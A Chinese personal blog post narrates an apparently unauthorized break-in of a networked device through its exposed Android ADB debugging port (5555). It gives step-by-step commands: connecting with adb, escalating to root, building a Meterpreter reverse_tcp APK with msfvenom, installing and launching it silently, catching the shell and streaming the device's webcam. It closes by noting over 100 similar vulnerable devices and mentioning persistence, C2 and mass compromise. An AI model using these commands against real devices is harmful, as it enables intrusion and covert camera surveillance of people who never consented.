[渗透测试]记一次5555端口渗透实战

[渗透测试]记一次5555端口渗透实战

还是在大一的时候,看到学长把某个设备搞了下来,还调用了上面的摄像头,觉得很酷(学长yyds!)。
于是偷偷搞来该设备的ip地址。使用Nmap扫了一下,发现只开启了5555端口,
当时还没有意识到什么(发生了肾么事情了),于是又使用了Openvas(现在改名GVM)扫了一下,
哦~,好像..,等等这堆英文是什么东西,百度一下看看...这.(心跳不由得加快了起来)
  • 原来它的远程调试端口是打开的....不是吧这么草率(很喜欢)

ADB

Android Debug Bridge(安卓调试桥) tools。它就是一个命令行窗口,用于通过电脑端与模拟器或者是设备之间的交互。

开始

  • 安装好ADB后,找到ADB的命令手册,终于可以开始了
adb connect ip地址
adb shell
su

直接获得了root权限... 很开心

但是如何向学长那样调摄像头呢?这困扰了我大一很久。一直到后来接触到了神器MSF

  • 首先创建MSF载荷

    msfvenom -p android/meterpreter/reverse_tcp LHOST=自己的IP地址 LPORT=4444 R > msfad.apk
    

  • 把载荷push到设备里面

    adb push /root/msfa.apk /sdcard/Download/msfad.apk
    

    查看了下,确实传上去了

  • 到这里,遇到了一个问题,安卓我一点也不懂啊。windows,linux大家都知道怎么通过命令行去执行文件,可是安卓到底怎么去执行文件呢,痛苦面具已戴上。百度走起,,

命令行安装 安卓apk

  • 首先安装apk

    adb shell pm install /sdcard/Download/msfad.apk
    

    也可以在shell里面操作直接 下同

    pm install /sdcard/Download/msfad.apk
    

  • 查看一下应用列表

    pm list packages -3
    

    找到的这个是 包名

  • 要想启动程序的话还需要一个启动页Activity

  • 查看应用详细信息 可以找到这个启动页Activity (包含“category.LAUNCHER”的Activity即为启动页Activity)

    adb shell dumpsys package com.metasploit.stage
    

  • 设置 MSF

    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set LHOST 本机IP
    set LPORT 4444(本机监听端口)
    run
    

  • 启动程序

    adb shell am start com.metasploit.stage/.MainActivity
    

  • 收到meterpreter

  • 找到meterpreter的命令 调用摄像头

webcam_list
wecam_stream


  • ok 到此就先告一段落了 嗯 实现了以后心情其实也就这样吧

    本文章只是用于技术交流,请于24h之内忘记 /滑稽
    

最后

后来对整个网段进行扫描,发现了100多个同样的设备
其实以现在的角度来看,能利用的还有很多
1.这个设备还控制另外一些摄像头,或许同样可以拿下
2.因为开局就送shell,利用方法还有很多,还可以做很多事情。
3.权限维持,C2上线,批量抓鸡。这个真没必要..
整个过程其实还是挺顺利的,并没有遇到什么阻碍,所以难度也降低很多了。运气挺好
分享2个链接

ADB命令
meterpreter后渗透

posted @ 2020-12-27 20:42  Ky1226  阅读(3994)  评论(0编辑  收藏  举报